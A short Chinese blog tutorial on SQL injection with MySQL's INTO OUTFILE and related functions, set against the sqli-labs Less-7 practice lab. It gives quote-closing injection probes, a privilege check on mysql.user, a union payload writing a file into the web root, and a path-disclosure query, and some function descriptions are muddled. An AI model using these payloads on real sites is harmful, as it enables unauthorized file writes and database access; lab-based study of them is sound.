web渗透——SQL注入文件dump

0x00前言

这次注入主要是针对PHP来说的。如果通过dump错误命令来进行错误盲注。

0x01 前置知识

outfile函数

说明

将表的内容到处为一个文本文件。

格式

select [列名] FROM table [where 语句] into outfile ‘目标文件’ [OPTION]

dumpfile

将表的内容导出为一个文本文件,一次到处一行

load_file

将数据导入mysql

0x02 知识

尝试判断:

(1)’–+
(2)’)–+
(3)’))–+

权限测试:

and (select count(*)from mysql.user)>0 --+

outfile测试:

id=1')) union select 1,2,3 into outfile 'D:/phpStudy/www/sqli-labs-master/less-7/1.txt'

获取mysql的绝对路径

select @@basedir as basePath from dual
阅读更多
版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/qq_36869808/article/details/79952905
上一篇Android笔记 —— Activity基础知识
下一篇java笔记——构造方法与匿名对象
想对作者说点什么? 我来说一句

没有更多推荐了,返回首页

关闭
关闭